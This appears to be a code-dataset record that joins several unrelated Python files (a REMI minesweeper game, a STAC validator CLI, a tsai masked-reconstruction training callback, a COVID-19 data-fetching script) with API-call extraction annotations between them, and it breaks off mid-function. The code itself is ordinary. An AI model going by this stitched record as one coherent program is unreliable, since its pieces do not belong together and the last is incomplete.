self.mine_matrix[cell.y + _y][cell.x + _x].check_mine(None, False)
checked_cells.append(self.mine_matrix[cell.y + _y][cell.x + _x])
def explosion(self, cell):
print("explosion")
self.mine_table = gui.Table(margin='0px auto')
self.main_container.append(self.mine_table, key="mine_table")
for x in range(0, len(self.mine_matrix[0])):
for y in range(0, len(self.mine_matrix)):
self.mine_matrix[y][x].style['background-color'] = 'red'
self.mine_matrix[y][x].check_mine(None, False)
self.mine_table.empty()
# self.mine_table.append_from_list(self.mine_matrix, False)
for x in range(0, len(self.mine_matrix[0])):
row = gui.TableRow()
for y in range(0, len(self.mine_matrix)):
row.append(self.mine_matrix[y][x])
self.mine_matrix[y][x].onclick.do(self.mine_matrix[y][x].check_mine)
self.mine_table.append(row)
if __name__ == "__main__":
start(MyApp, multiple_instance=True, address='0.0.0.0', port=0, debug=True, start_browser=True)
|
[
"remi.gui.Container",
"threading.Timer",
"random.randint",
"remi.gui.GenericDialog",
"remi.gui.TableRow",
"remi.gui.Table",
"remi.gui.Image",
"remi.gui.Link",
"remi.start",
"remi.gui.Button",
"remi.gui.Label"
] |
[((10512, 10611), 'remi.start', 'start', (['MyApp'], {'multiple_instance': '(True)', 'address': '"""0.0.0.0"""', 'port': '(0)', 'debug': '(True)', 'start_browser': '(True)'}), "(MyApp, multiple_instance=True, address='0.0.0.0', port=0, debug=True,\n start_browser=True)\n", (10517, 10611), False, 'from remi import start, App\n'), ((3474, 3506), 'remi.gui.Container', 'gui.Container', ([], {'margin': '"""0px auto"""'}), "(margin='0px auto')\n", (3487, 3506), True, 'import remi.gui as gui\n'), ((3659, 3687), 'remi.gui.Label', 'gui.Label', (['"""Mine Field GAME"""'], {}), "('Mine Field GAME')\n", (3668, 3687), True, 'import remi.gui as gui\n'), ((3887, 3936), 'remi.gui.Label', 'gui.Label', (['"""Collaborative minefield game. Enjoy."""'], {}), "('Collaborative minefield game. Enjoy.')\n", (3896, 3936), True, 'import remi.gui as gui\n'), ((4091, 4109), 'remi.gui.Label', 'gui.Label', (['"""Mines"""'], {}), "('Mines')\n", (4100, 4109), True, 'import remi.gui as gui\n'), ((4182, 4200), 'remi.gui.Label', 'gui.Label', (['"""Flags"""'], {}), "('Flags')\n", (4191, 4200), True, 'import remi.gui as gui\n'), ((4297, 4314), 'remi.gui.Label', 'gui.Label', (['"""Time"""'], {}), "('Time')\n", (4306, 4314), True, 'import remi.gui as gui\n'), ((4378, 4399), 'remi.gui.Button', 'gui.Button', (['"""Restart"""'], {}), "('Restart')\n", (4388, 4399), True, 'import remi.gui as gui\n'), ((4523, 4538), 'remi.gui.Container', 'gui.Container', ([], {}), '()\n', (4536, 4538), True, 'import remi.gui as gui\n'), ((4880, 4915), 'remi.gui.Image', 'gui.Image', (['"""/my_resources:mine.png"""'], {}), "('/my_resources:mine.png')\n", (4889, 4915), True, 'import remi.gui as gui\n'), ((5038, 5073), 'remi.gui.Image', 'gui.Image', (['"""/my_resources:flag.png"""'], {}), "('/my_resources:flag.png')\n", (5047, 5073), True, 'import remi.gui as gui\n'), ((5338, 5430), 'remi.gui.Link', 'gui.Link', (['"""https://github.com/rawpython/remi"""', '"""This is an example of REMI gui library."""'], {}), "('https://github.com/rawpython/remi',\n 'This is an example of REMI gui library.')\n", (5346, 5430), True, 'import remi.gui as gui\n'), ((6188, 6216), 'remi.gui.Table', 'gui.Table', ([], {'margin': '"""0px auto"""'}), "(margin='0px auto')\n", (6197, 6216), True, 'import remi.gui as gui\n'), ((9720, 9748), 'remi.gui.Table', 'gui.Table', ([], {'margin': '"""0px auto"""'}), "(margin='0px auto')\n", (9729, 9748), True, 'import remi.gui as gui\n'), ((6392, 6406), 'remi.gui.TableRow', 'gui.TableRow', ([], {}), '()\n', (6404, 6406), True, 'import remi.gui as gui\n'), ((7158, 7182), 'random.randint', 'random.randint', (['(0)', '(w - 1)'], {}), '(0, w - 1)\n', (7172, 7182), False, 'import random\n'), ((7199, 7223), 'random.randint', 'random.randint', (['(0)', '(h - 1)'], {}), '(0, h - 1)\n', (7213, 7223), False, 'import random\n'), ((8525, 8617), 'remi.gui.GenericDialog', 'gui.GenericDialog', ([], {'title': '"""You Win!"""', 'message': "('Game done in %s seconds' % self.time_count)"}), "(title='You Win!', message='Game done in %s seconds' %\n self.time_count)\n", (8542, 8617), True, 'import remi.gui as gui\n'), ((10234, 10248), 'remi.gui.TableRow', 'gui.TableRow', ([], {}), '()\n', (10246, 10248), True, 'import remi.gui as gui\n'), ((3302, 3339), 'threading.Timer', 'threading.Timer', (['(1)', 'self.display_time'], {}), '(1, self.display_time)\n', (3317, 3339), False, 'import threading\n')]
|
import json
import sys
import click # type: ignore
from stac_check.cli import cli_message as lint_message # type: ignore
from stac_check.lint import Linter # type: ignore
from .validate import StacValidate
@click.command()
@click.argument("stac_file")
@click.option(
"--lint",
is_flag=True,
help="Use stac-check to lint the stac object in addition to validating it.",
)
@click.option(
"--core", is_flag=True, help="Validate core stac object only without extensions."
)
@click.option("--extensions", is_flag=True, help="Validate extensions only.")
@click.option(
"--links",
is_flag=True,
help="Additionally validate links. Only works with default mode.",
)
@click.option(
"--assets",
is_flag=True,
help="Additionally validate assets. Only works with default mode.",
)
@click.option(
"--custom",
"-c",
default="",
help="Validate against a custom schema (local filepath or remote schema).",
)
@click.option(
"--recursive",
"-r",
is_flag=True,
help="Recursively validate all related stac objects.",
)
@click.option(
"--max-depth",
"-m",
type=int,
help="Maximum depth to traverse when recursing. Omit this argument to get full recursion. Ignored if `recursive == False`.",
)
@click.option(
"-v", "--verbose", is_flag=True, help="Enables verbose output for recursive mode."
)
@click.option("--no_output", is_flag=True, help="Do not print output to console.")
@click.option(
"--log_file",
default="",
help="Save full recursive output to log file (local filepath).",
)
@click.version_option(version="3.0.0")
def main(
stac_file,
lint,
recursive,
max_depth,
core,
extensions,
links,
assets,
custom,
verbose,
no_output,
log_file,
):
valid = True
if lint is True:
linter = Linter(stac_file, assets=True, links=True, recursive=False)
lint_message(linter)
else:
stac = StacValidate(
stac_file=stac_file,
recursive=recursive,
max_depth=max_depth,
core=core,
links=links,
assets=assets,
extensions=extensions,
custom=custom,
verbose=verbose,
no_output=no_output,
log=log_file,
)
valid = stac.run()
if no_output is False:
click.echo(json.dumps(stac.message, indent=4))
sys.exit(0 if valid else 1)
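# Usage sketch, assuming the package installs a console entry point named
# `stac_validator` (the exact script name is an assumption):
#   stac_validator item.json --lint
#   stac_validator catalog.json --recursive --max-depth 2 --log_file out.json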
if __name__ == "__main__":
main()
|
[
"click.version_option",
"click.argument",
"click.option",
"stac_check.lint.Linter",
"json.dumps",
"click.command",
"stac_check.cli.cli_message",
"sys.exit"
] |
[((214, 229), 'click.command', 'click.command', ([], {}), '()\n', (227, 229), False, 'import click\n'), ((231, 258), 'click.argument', 'click.argument', (['"""stac_file"""'], {}), "('stac_file')\n", (245, 258), False, 'import click\n'), ((260, 378), 'click.option', 'click.option', (['"""--lint"""'], {'is_flag': '(True)', 'help': '"""Use stac-check to lint the stac object in addition to validating it."""'}), "('--lint', is_flag=True, help=\n 'Use stac-check to lint the stac object in addition to validating it.')\n", (272, 378), False, 'import click\n'), ((390, 490), 'click.option', 'click.option', (['"""--core"""'], {'is_flag': '(True)', 'help': '"""Validate core stac object only without extensions."""'}), "('--core', is_flag=True, help=\n 'Validate core stac object only without extensions.')\n", (402, 490), False, 'import click\n'), ((493, 569), 'click.option', 'click.option', (['"""--extensions"""'], {'is_flag': '(True)', 'help': '"""Validate extensions only."""'}), "('--extensions', is_flag=True, help='Validate extensions only.')\n", (505, 569), False, 'import click\n'), ((571, 680), 'click.option', 'click.option', (['"""--links"""'], {'is_flag': '(True)', 'help': '"""Additionally validate links. Only works with default mode."""'}), "('--links', is_flag=True, help=\n 'Additionally validate links. Only works with default mode.')\n", (583, 680), False, 'import click\n'), ((692, 803), 'click.option', 'click.option', (['"""--assets"""'], {'is_flag': '(True)', 'help': '"""Additionally validate assets. Only works with default mode."""'}), "('--assets', is_flag=True, help=\n 'Additionally validate assets. Only works with default mode.')\n", (704, 803), False, 'import click\n'), ((815, 938), 'click.option', 'click.option', (['"""--custom"""', '"""-c"""'], {'default': '""""""', 'help': '"""Validate against a custom schema (local filepath or remote schema)."""'}), "('--custom', '-c', default='', help=\n 'Validate against a custom schema (local filepath or remote schema).')\n", (827, 938), False, 'import click\n'), ((954, 1061), 'click.option', 'click.option', (['"""--recursive"""', '"""-r"""'], {'is_flag': '(True)', 'help': '"""Recursively validate all related stac objects."""'}), "('--recursive', '-r', is_flag=True, help=\n 'Recursively validate all related stac objects.')\n", (966, 1061), False, 'import click\n'), ((1077, 1255), 'click.option', 'click.option', (['"""--max-depth"""', '"""-m"""'], {'type': 'int', 'help': '"""Maximum depth to traverse when recursing. Omit this argument to get full recursion. Ignored if `recursive == False`."""'}), "('--max-depth', '-m', type=int, help=\n 'Maximum depth to traverse when recursing. Omit this argument to get full recursion. 
Ignored if `recursive == False`.'\n )\n", (1089, 1255), False, 'import click\n'), ((1266, 1367), 'click.option', 'click.option', (['"""-v"""', '"""--verbose"""'], {'is_flag': '(True)', 'help': '"""Enables verbose output for recursive mode."""'}), "('-v', '--verbose', is_flag=True, help=\n 'Enables verbose output for recursive mode.')\n", (1278, 1367), False, 'import click\n'), ((1370, 1456), 'click.option', 'click.option', (['"""--no_output"""'], {'is_flag': '(True)', 'help': '"""Do not print output to console."""'}), "('--no_output', is_flag=True, help=\n 'Do not print output to console.')\n", (1382, 1456), False, 'import click\n'), ((1453, 1561), 'click.option', 'click.option', (['"""--log_file"""'], {'default': '""""""', 'help': '"""Save full recursive output to log file (local filepath)."""'}), "('--log_file', default='', help=\n 'Save full recursive output to log file (local filepath).')\n", (1465, 1561), False, 'import click\n'), ((1573, 1610), 'click.version_option', 'click.version_option', ([], {'version': '"""3.0.0"""'}), "(version='3.0.0')\n", (1593, 1610), False, 'import click\n'), ((2423, 2450), 'sys.exit', 'sys.exit', (['(0 if valid else 1)'], {}), '(0 if valid else 1)\n', (2431, 2450), False, 'import sys\n'), ((1838, 1897), 'stac_check.lint.Linter', 'Linter', (['stac_file'], {'assets': '(True)', 'links': '(True)', 'recursive': '(False)'}), '(stac_file, assets=True, links=True, recursive=False)\n', (1844, 1897), False, 'from stac_check.lint import Linter\n'), ((1906, 1926), 'stac_check.cli.cli_message', 'lint_message', (['linter'], {}), '(linter)\n', (1918, 1926), True, 'from stac_check.cli import cli_message as lint_message\n'), ((2382, 2416), 'json.dumps', 'json.dumps', (['stac.message'], {'indent': '(4)'}), '(stac.message, indent=4)\n', (2392, 2416), False, 'import json\n')]
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/063_callback.MVP.ipynb (unless otherwise specified).
__all__ = ['create_subsequence_mask', 'create_variable_mask', 'create_future_mask', 'natural_mask', 'create_mask',
'MVP', 'TSBERT']
# Cell
from ..imports import *
from fastai.callback.all import *
from ..utils import *
from ..models.utils import *
from ..models.layers import *
# Cell
from torch.distributions.beta import Beta
# Cell
from torch.distributions.geometric import Geometric
from torch.distributions.binomial import Binomial
def create_subsequence_mask(o, r=.15, lm=3, stateful=True, sync=False):
if r <= 0: return torch.zeros_like(o).bool()
device = o.device
if o.ndim == 2: o = o[None]
n_masks, mask_dims, mask_len = o.shape
if sync == 'random': sync = random.random() > .5
dims = 1 if sync else mask_dims
if stateful:
numels = n_masks * dims * mask_len
pm = torch.tensor([1 / lm], device=device)
pu = torch.clip(pm * (r / max(1e-6, 1 - r)), 1e-3, 1)
zot, proba_a, proba_b = (torch.as_tensor([False, True], device=device), pu, pm) if random.random() > pm else \
(torch.as_tensor([True, False], device=device), pm, pu)
max_len = max(1, 2 * math.ceil(numels // (1/pm + 1/pu)))
for i in range(10):
_dist_a = (Geometric(probs=proba_a).sample([max_len])+1).long()
_dist_b = (Geometric(probs=proba_b).sample([max_len])+1).long()
dist_a = _dist_a if i == 0 else torch.cat((dist_a, _dist_a), dim=0)
dist_b = _dist_b if i == 0 else torch.cat((dist_b, _dist_b), dim=0)
add = torch.add(dist_a, dist_b)
if torch.gt(torch.sum(add), numels): break
dist_len = torch.argmax((torch.cumsum(add, 0) >= numels).float()) + 1
if dist_len%2: dist_len += 1
repeats = torch.cat((dist_a[:dist_len], dist_b[:dist_len]), -1).flatten()
zot = zot.repeat(dist_len)
mask = torch.repeat_interleave(zot, repeats)[:numels].reshape(n_masks, dims, mask_len)
else:
probs = torch.tensor(r, device=device)
mask = Binomial(1, probs).sample((n_masks, dims, mask_len)).bool()
if sync: mask = mask.repeat(1, mask_dims, 1)
return mask
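# Usage sketch, assuming torch is available (pulled in via tsai's star imports):
#   o = torch.randn(4, 3, 100)                    # batch x variables x steps
#   m = create_subsequence_mask(o, r=.15, lm=3)   # bool tensor, True = masked
#   assert m.shape == o.shape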
def create_variable_mask(o, r=.15):
if r <= 0: return torch.zeros_like(o).bool()
device = o.device
n_masks, mask_dims, mask_len = o.shape
_mask = torch.zeros((n_masks * mask_dims, mask_len), device=device)
if int(mask_dims * r) > 0:
n_masked_vars = int(n_masks * mask_dims * r)
p = torch.tensor([1./(n_masks * mask_dims)], device=device).repeat([n_masks * mask_dims])
sel_dims = p.multinomial(num_samples=n_masked_vars, replacement=False)
_mask[sel_dims] = 1
mask = _mask.reshape(*o.shape).bool()
return mask
def create_future_mask(o, r=.15, sync=False):
if r <= 0: return torch.zeros_like(o).bool()
if o.ndim == 2: o = o[None]
n_masks, mask_dims, mask_len = o.shape
if sync == 'random': sync = random.random() > .5
dims = 1 if sync else mask_dims
probs = torch.tensor(r, device=o.device)
mask = Binomial(1, probs).sample((n_masks, dims, mask_len))
if sync: mask = mask.repeat(1, mask_dims, 1)
mask = torch.sort(mask,dim=-1, descending=False)[0].bool()
return mask
def natural_mask(o):
"""Applies natural missingness in a batch to non-nan values in the next sample"""
mask1 = torch.isnan(o)
mask2 = rotate_axis0(mask1)
return torch.logical_and(mask2, ~mask1)
# Cell
def create_mask(o, r=.15, lm=3, stateful=True, sync=False, subsequence_mask=True, variable_mask=False, future_mask=False):
if r <= 0 or r >=1: return torch.zeros_like(o).bool()
if int(r * o.shape[1]) == 0:
variable_mask = False
if subsequence_mask and variable_mask:
random_thr = 1/3 if sync == 'random' else 1/2
if random.random() > random_thr:
variable_mask = False
else:
subsequence_mask = False
elif future_mask:
return create_future_mask(o, r=r)
elif subsequence_mask:
return create_subsequence_mask(o, r=r, lm=lm, stateful=stateful, sync=sync)
elif variable_mask:
return create_variable_mask(o, r=r)
else:
raise ValueError('You need to set subsequence_mask, variable_mask or future_mask to True or pass a custom mask.')
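# Usage sketch: create_mask simply dispatches to the maskers defined above.
#   mask = create_mask(xb, r=.15)                                              # subsequence masking (default)
#   mask = create_mask(xb, r=.15, subsequence_mask=False, variable_mask=True)  # mask whole variables instead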
# Cell
import matplotlib.colors as mcolors
class MVP(Callback):
order = 60
def __init__(self, r: float = .15, subsequence_mask: bool = True, lm: float = 3., stateful: bool = True, sync: bool = False, variable_mask: bool = False,
future_mask: bool = False, custom_mask: Optional = None, nan_to_num: int = 0, window_size: Optional[tuple] = None, dropout: float = .1,
crit: callable = None, weights_path: Optional[str] = None, target_dir: str = './data/MVP', fname: str = 'model', save_best: bool = True,
verbose: bool = False):
r"""
        Callback used to perform the pretext task of reconstructing the original data after a binary mask has been applied.
        Args:
            r: probability of masking.
subsequence_mask: apply a mask to random subsequences.
            lm: average mask length when using stateful (geometric) masking.
stateful: geometric distribution is applied so that average mask length is lm.
sync: all variables have the same masking.
variable_mask: apply a mask to random variables. Only applicable to multivariate time series.
future_mask: used to train a forecasting model.
custom_mask: allows to pass any type of mask with input tensor and output tensor. Values to mask should be set to True.
nan_to_num: integer used to fill masked values
            window_size: allows you to pass a fixed window size or a tuple of window sizes to train MVP on sequences of different lengths.
                         You may pass int(s) or float(s).
dropout: dropout applied to the head of the model during pretraining.
crit: loss function that will be used. If None MSELossFlat().
            weights_path: indicates the path to pretrained weights. This is useful when you want to continue training from a checkpoint. It will load the
                          pretrained weights into the model with the MVP head.
target_dir : directory where trained model will be stored.
fname : file name that will be used to save the pretrained model.
save_best: saves best model weights
"""
assert subsequence_mask or variable_mask or future_mask or custom_mask, \
'you must set (subsequence_mask and/or variable_mask) or future_mask to True or use a custom_mask'
if custom_mask is not None and (future_mask or subsequence_mask or variable_mask):
warnings.warn("Only custom_mask will be used")
elif future_mask and (subsequence_mask or variable_mask):
warnings.warn("Only future_mask will be used")
store_attr("subsequence_mask,variable_mask,future_mask,custom_mask,dropout,r,lm,stateful,sync,crit,weights_path,fname,save_best,verbose,nan_to_num")
self.PATH = Path(f'{target_dir}/{self.fname}')
if not os.path.exists(self.PATH.parent):
os.makedirs(self.PATH.parent)
self.path_text = f"pretrained weights_path='{self.PATH}.pth'"
self.window_size = window_size
def before_fit(self):
self.run = not hasattr(self, "gather_preds")
if 'SaveModelCallback' in [cb.__class__.__name__ for cb in self.learn.cbs]:
self.save_best = False # avoid saving if SaveModelCallback is being used
if not(self.run): return
# prepare to save best model
self.best = float('inf')
# modify loss for denoising task
self.old_loss_func = self.learn.loss_func
self.learn.loss_func = self._loss
if self.crit is None:
self.crit = MSELossFlat()
self.learn.MVP = self
self.learn.TSBERT = self
# remove and store metrics
self.learn.metrics = L([])
# change head with conv layer (equivalent to linear layer applied to dim=1)
assert hasattr(self.learn.model, "head"), "model must have a head attribute to be trained with MVP"
self.learn.model.head = nn.Sequential(nn.Dropout(self.dropout),
nn.Conv1d(self.learn.model.head_nf, self.learn.dls.vars, 1)
).to(self.learn.dls.device)
if self.weights_path is not None:
transfer_weights(learn.model, self.weights_path, device=self.learn.dls.device, exclude_head=False)
with torch.no_grad():
xb = torch.randn(2, self.learn.dls.vars, self.learn.dls.len).to(self.learn.dls.device)
assert xb.shape == self.learn.model(xb).shape, 'the model cannot reproduce the input shape'
if self.window_size:
if isinstance(self.window_size, float) or self.window_size == 1:
self.window_size = int(round(self.window_size * self.learn.dls.len))
elif is_listy(self.window_size):
self.window_size = list(self.window_size)
for i in range(len(self.window_size)):
if isinstance(self.window_size[i], float) or self.window_size[i] == 1:
self.window_size[i] = int(round(self.window_size[i] * self.learn.dls.len))
def before_batch(self):
original_mask = torch.isnan(self.x)
if self.custom_mask is not None:
new_mask = self.custom_mask(self.x)
else:
new_mask = create_mask(self.x, r=self.r, lm=self.lm, stateful=self.stateful, sync=self.sync, subsequence_mask=self.subsequence_mask,
variable_mask=self.variable_mask, future_mask=self.future_mask).bool()
if original_mask.any():
self.mask = torch.logical_and(new_mask, ~original_mask)
else:
self.mask = new_mask
# self.learn.yb = (torch.nan_to_num(self.x, self.nan_to_num),) # Only available in Pytorch 1.8
self.learn.yb = (torch_nan_to_num(self.x, self.nan_to_num),)
self.learn.xb = (self.yb[0].masked_fill(self.mask, self.nan_to_num), )
if self.window_size:
if is_listy(self.window_size): ws = np.random.randint(*self.window_size)
else: ws = self.window_size
w_start = np.random.randint(0, self.x.shape[-1] - ws)
self.learn.xb = (self.learn.xb[0][..., w_start:w_start+ws], )
self.learn.yb = (self.learn.yb[0][..., w_start:w_start+ws], )
self.mask = self.mask[..., w_start:w_start+ws]
def after_epoch(self):
val = self.learn.recorder.values[-1][-1]
if self.save_best:
if np.less(val, self.best):
self.best = val
self.best_epoch = self.epoch
torch.save(self.learn.model.state_dict(), f'{self.PATH}.pth')
pv(f"best epoch: {self.best_epoch:3} val_loss: {self.best:8.6f} - {self.path_text}", self.verbose or (self.epoch == self.n_epoch - 1))
elif self.epoch == self.n_epoch - 1:
print(f"\nepochs: {self.n_epoch} best epoch: {self.best_epoch:3} val_loss: {self.best:8.6f} - {self.path_text}\n")
def after_fit(self):
self.run = True
def _loss(self, preds, target):
return self.crit(preds[self.mask], target[self.mask])
def show_preds(self, max_n=9, nrows=3, ncols=3, figsize=None, sharex=True, **kwargs):
b = self.learn.dls.valid.one_batch()
self.learn._split(b)
self.learn('before_batch')
xb = self.xb[0].detach().cpu().numpy()
bs, nvars, seq_len = xb.shape
masked_pred = torch.where(self.mask, self.learn.model(*self.learn.xb), tensor([np.nan], device=self.learn.x.device))
masked_pred = masked_pred.detach().cpu().numpy()
ncols = min(ncols, math.ceil(bs / ncols))
nrows = min(nrows, math.ceil(bs / ncols))
max_n = min(max_n, bs, nrows*ncols)
if figsize is None:
figsize = (ncols*6, math.ceil(max_n/ncols)*4)
fig, ax = plt.subplots(nrows=nrows, ncols=ncols,
figsize=figsize, sharex=sharex, **kwargs)
idxs = np.random.permutation(np.arange(bs))
colors = list(mcolors.TABLEAU_COLORS.keys()) + \
random_shuffle(list(mcolors.CSS4_COLORS.keys()))
i = 0
for row in ax:
for col in row:
color_iter = iter(colors)
for j in range(nvars):
try:
color = next(color_iter)
except:
color_iter = iter(colors)
color = next(color_iter)
col.plot(xb[idxs[i]][j], alpha=.5, color=color)
col.plot(masked_pred[idxs[i]][j],
marker='o', markersize=4, linestyle='None', color=color)
i += 1
plt.tight_layout()
plt.show()
TSBERT = MVP
|
[
"torch.distributions.binomial.Binomial",
"matplotlib.colors.TABLEAU_COLORS.keys",
"torch.distributions.geometric.Geometric",
"matplotlib.colors.CSS4_COLORS.keys"
] |
[((3130, 3148), 'torch.distributions.binomial.Binomial', 'Binomial', (['(1)', 'probs'], {}), '(1, probs)\n', (3138, 3148), False, 'from torch.distributions.binomial import Binomial\n'), ((12583, 12612), 'matplotlib.colors.TABLEAU_COLORS.keys', 'mcolors.TABLEAU_COLORS.keys', ([], {}), '()\n', (12610, 12612), True, 'import matplotlib.colors as mcolors\n'), ((12650, 12676), 'matplotlib.colors.CSS4_COLORS.keys', 'mcolors.CSS4_COLORS.keys', ([], {}), '()\n', (12674, 12676), True, 'import matplotlib.colors as mcolors\n'), ((2119, 2137), 'torch.distributions.binomial.Binomial', 'Binomial', (['(1)', 'probs'], {}), '(1, probs)\n', (2127, 2137), False, 'from torch.distributions.binomial import Binomial\n'), ((1332, 1356), 'torch.distributions.geometric.Geometric', 'Geometric', ([], {'probs': 'proba_a'}), '(probs=proba_a)\n', (1341, 1356), False, 'from torch.distributions.geometric import Geometric\n'), ((1408, 1432), 'torch.distributions.geometric.Geometric', 'Geometric', ([], {'probs': 'proba_b'}), '(probs=proba_b)\n', (1417, 1432), False, 'from torch.distributions.geometric import Geometric\n')]
|
import pandas as pd
from sodapy import Socrata
import datetime
import definitions
# global variables for main data:
hhs_data, test_data, nyt_data_us, nyt_data_state, max_hosp_date = [],[],[],[],[]
"""
get_data()
Fetches data from API, filters, cleans, and combines with provisional.
After running, global variables are filled for use in subsequent functions
"""
def get_data():
global nyt_data_us
global nyt_data_state
global test_data
global hhs_data
global max_hosp_date
nyt_data_us = pd.read_csv("https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us.csv")
nyt_data_state = pd.read_csv("https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us-states.csv")
client = Socrata("healthdata.gov", None)
results = client.get("g62h-syeh", limit=2000000)
test_results = client.get("j8mb-icvb", limit=2000000)
print("LOG: Fetched all raw data")
# Filter data to get columns of interest
hhs_data = pd.DataFrame.from_records(results)[['state', 'date', 'inpatient_beds_used_covid']]
hhs_data.inpatient_beds_used_covid = hhs_data.inpatient_beds_used_covid.fillna(0)
hhs_data = hhs_data.astype({'inpatient_beds_used_covid': 'int32'})
test_data = pd.DataFrame.from_records(test_results)[['state', 'date', 'overall_outcome', 'new_results_reported']]
test_data.new_results_reported = test_data.new_results_reported.fillna(0)
test_data = test_data.astype({'new_results_reported': 'int32'})
print("LOG: Filtered Data")
# For provisional data, gets days since most recent update of HHS time series
max_date = hhs_data.date.max()
max_hosp_date = max_date
provisional = client.get("4cnb-m4rz", limit=2000000, where=f"update_date > '{max_date}'")
hhs_provisional = pd.DataFrame.from_records(provisional)[['update_date', 'archive_link']]
hhs_provisional.update_date = hhs_provisional.update_date.apply(lambda x: x[:10])
hhs_provisional.update_date = pd.to_datetime(hhs_provisional.update_date)
# Gets last archive of every day
group = hhs_provisional.groupby(['update_date'])
hhs_provisional = group.last()
# Add provisional data to HHS data
frames = []
for a in hhs_provisional.iterrows():
date = a[0]
url = a[1].item()['url']
df = pd.read_csv(url)[['state', 'inpatient_beds_used_covid']]
df['date']=date
if date > pd.Timestamp(max_date): # Avoids double counting if provisional update came after real update
frames.append(df)
frames.append(hhs_data)
hhs_data = (pd.concat(frames))
print("LOG: Added HHS Provisional data")
# Make date columns in proper format
# hhs_data.date = hhs_data.date.apply(lambda x: x[:10])
hhs_data.date= pd.to_datetime(hhs_data.date)
# hhs_data.to_csv("../data/hospitalizations.csv")
print("LOG: Wrote HHS data to CSV")
test_data.date = test_data.date.apply(lambda x: x[:10])
test_data.date = pd.to_datetime(test_data.date)
nyt_data_us.date = pd.to_datetime(nyt_data_us.date)
nyt_data_state.date = pd.to_datetime(nyt_data_state.date)
print("LOG: Done getting data")
"""
get_state_cases
Creates dataframe of time series date and cases for given state
inputs:
state_codes: List of 2-letter codes of states to query
start_date (pd.Timestamp): starting date, defaults to 1-1-2020
end_date (pd.Timestamp): ending date, defaults to today
returns:
    df with 'date' and 'cases'
"""
def get_state_cases(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today(), normalize=True):
curr_date = start_date
input_states = [definitions.states[s] for s in state_codes]
state_data = nyt_data_state[nyt_data_state.state.isin(input_states)][:]
max_date = state_data.date.max()
states_population = sum([definitions.populations[s] for s in input_states])
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = state_data[state_data.date == str(curr_date)]
if normalize:
case_sum = day_data.cases.sum() / states_population * 1000000
else:
case_sum = day_data.cases.sum()
newRow = {'date': curr_date, 'cases': case_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
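# Usage sketch (state codes as in definitions.states; get_data() must be
# called first to populate the module-level frames):
#   get_data()
#   df = get_state_cases(['NY', 'NJ'])   # daily cases per million for NY + NJ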
def get_us_cases(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
us_data = nyt_data_us[(nyt_data_us.date >= start_date) & (nyt_data_us.date <= end_date)]
return us_data[['date', 'cases']]
"""
get_state_deaths
Same as above, deaths
"""
def get_state_deaths(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today(), normalize=True):
curr_date = start_date
input_states = [definitions.states[s] for s in state_codes]
state_data = nyt_data_state[nyt_data_state.state.isin(input_states)]
max_date = state_data.date.max()
states_population = sum([definitions.populations[s] for s in input_states])
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = state_data[state_data.date == str(curr_date)]
if normalize:
case_sum = day_data.deaths.sum() / states_population * 1000000
else:
case_sum = day_data.deaths.sum()
newRow = {'date': curr_date, 'deaths': case_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
def get_us_deaths(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
us_data = nyt_data_us[(nyt_data_us.date >= start_date) & (nyt_data_us.date <= end_date)]
return us_data[['date', 'deaths']]
"""
get_state_hospitalizations
Same as above, hospitalizations
"""
def get_state_hospitalizations(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today(), normalize=True):
curr_date = start_date
state_data = hhs_data[hhs_data.state.isin(state_codes)]
input_states = [definitions.states[s] for s in state_codes]
max_date = state_data.date.max()
states_population = sum([definitions.populations[s] for s in input_states])
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = state_data[state_data.date == str(curr_date)]
if normalize:
hosp_sum = day_data.inpatient_beds_used_covid.sum() / states_population * 1000000
else:
hosp_sum = day_data.inpatient_beds_used_covid.sum()
newRow = {'date': curr_date, 'hospitalizations': hosp_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
"""
get_us_hospitalizations
Same as above, hospitalizations
"""
def get_us_hospitalizations(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
curr_date = start_date
max_date = hhs_data.date.max()
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = hhs_data[hhs_data.date == str(curr_date)]
hosp_sum = day_data.inpatient_beds_used_covid.sum()
newRow = {'date': curr_date, 'inpatient_beds_used_covid': hosp_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
"""
get_state_positivity
Creates dataframe of time series date and test positivity for given state
inputs:
    state_codes: list of 2-letter codes of states
start_date (pd.Timestamp): starting date, defaults to 1-1-2020
end_date (pd.Timestamp): ending date, defaults to today
returns:
df with 'date' and 'test_positivity'
"""
def get_state_positivity(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
test_data_state = test_data[test_data.state.isin(state_codes)] # Get only data from input State
max_date = test_data_state.date.max()
curr_date = start_date
lst = []
while(curr_date <= end_date and curr_date <= max_date): # Loop through all unique dates
day_data = test_data_state[test_data_state.date == str(curr_date)]
test_pos = day_data[day_data.overall_outcome == "Positive"].new_results_reported # Get num positive tests
test_pos = test_pos.sum() if test_pos.any() else 0 # Extract number if exists
test_neg = day_data[day_data.overall_outcome == "Negative"].new_results_reported # Get num negative tests
test_neg = test_neg.sum() if test_neg.any() else 0 # Extract number if exists
if(test_pos == 0 and test_neg == 0):
test_pct = 0 # Fixes divide by zero issue
else:
test_pct = test_pos/ (test_pos + test_neg) * 100
newRow = {"date": curr_date, "test_positivity": test_pct, "positive_tests" : test_pos, "negative_tests" : test_neg}
lst.append(newRow)
curr_date += datetime.timedelta(1)
df = pd.DataFrame(lst) # Create dataframe with all dates and test positivity
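    # The 7-day average below is a ratio of rolling sums (positives over all
    # tests), not a mean of daily percentages, so low-volume days are
    # weighted by their test counts.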
a = df.rolling(7).sum()
